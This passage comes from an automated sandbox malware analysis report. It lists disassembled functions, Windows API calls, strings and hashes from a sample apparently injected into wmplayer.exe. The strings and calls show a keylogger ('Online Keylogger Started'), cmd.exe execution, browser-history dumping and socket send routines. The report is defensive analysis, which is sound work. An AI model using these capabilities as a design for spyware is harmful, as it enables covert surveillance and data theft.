                                                                                            • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                            • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                            Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 1000536F
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 10005381
                                                                                            • _free.LIBCMT ref: 10005394
                                                                                            • _free.LIBCMT ref: 100053A5
                                                                                            • _free.LIBCMT ref: 100053B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                            • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                            • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                            • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                            Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                            • String ID: (FG
                                                                                            • API String ID: 3142014140-2273637114
                                                                                            • Opcode ID: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                            • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                            • Opcode Fuzzy Hash: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                            • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                            Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                            • _free.LIBCMT ref: 0044D5C5
                                                                                              • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                              • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                              • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                            • String ID: *?$.
                                                                                            • API String ID: 2812119850-3972193922
                                                                                            • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                            • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                            • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                            • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                            Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                              • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,00D8BAC8,00000010), ref: 004042A5
                                                                                              • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                            • String ID: XCG$`AG$>G
                                                                                            • API String ID: 2334542088-2372832151
                                                                                            • Opcode ID: 8a8ecbd8101e95278cb0480dd491a454bc98c9d8db51b8974174652163066092
                                                                                            • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                            • Opcode Fuzzy Hash: 8a8ecbd8101e95278cb0480dd491a454bc98c9d8db51b8974174652163066092
                                                                                            • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                            Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000104), ref: 00442714
                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                            • API String ID: 2506810119-2246096414
                                                                                            • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                            • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                            Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000104), ref: 10004C1D
                                                                                            • _free.LIBCMT ref: 10004CE8
                                                                                            • _free.LIBCMT ref: 10004CF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                            • API String ID: 2506810119-2246096414
                                                                                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                            Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                            • API String ID: 368326130-2663660666
                                                                                            • Opcode ID: a76726b47ade6a03491d848e6c0f6bffc38de7506ed2be7e87e14d0b5935c260
                                                                                            • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                            • Opcode Fuzzy Hash: a76726b47ade6a03491d848e6c0f6bffc38de7506ed2be7e87e14d0b5935c260
                                                                                            • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                            Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventLocalTimewsprintf
                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                            • API String ID: 1497725170-1359877963
                                                                                            • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                            • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                            • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                            • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                            Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                            • String ID: Online Keylogger Started
                                                                                            • API String ID: 112202259-1258561607
                                                                                            • Opcode ID: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
                                                                                            • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                            • Opcode Fuzzy Hash: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
                                                                                            • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                            Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                            • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                            • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                            • String ID: `@
                                                                                            • API String ID: 2583163307-951712118
                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                            • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                            • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                            Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                            • String ID: Connection Timeout
                                                                                            • API String ID: 2055531096-499159329
                                                                                            • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                            • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                            • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                            • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                            Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                            • String ID: bad locale name
                                                                                            • API String ID: 3628047217-1405518554
                                                                                            • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                            • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                            • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                            • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                            Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExecuteShell
                                                                                            • String ID: /C $cmd.exe$open
                                                                                            • API String ID: 587946157-3896048727
                                                                                            • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                            • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                            Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                            • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 3123878439-4028850238
                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                            Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetCursorInfo$User32.dll
                                                                                            • API String ID: 1646373207-2714051624
                                                                                            • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                            • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                            • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                            • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                            Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                            • API String ID: 2574300362-1519888992
                                                                                            • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                            • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                            • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                            • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                            Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __alldvrm$_strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1036877536-0
                                                                                            • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                            • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                            • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                            • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
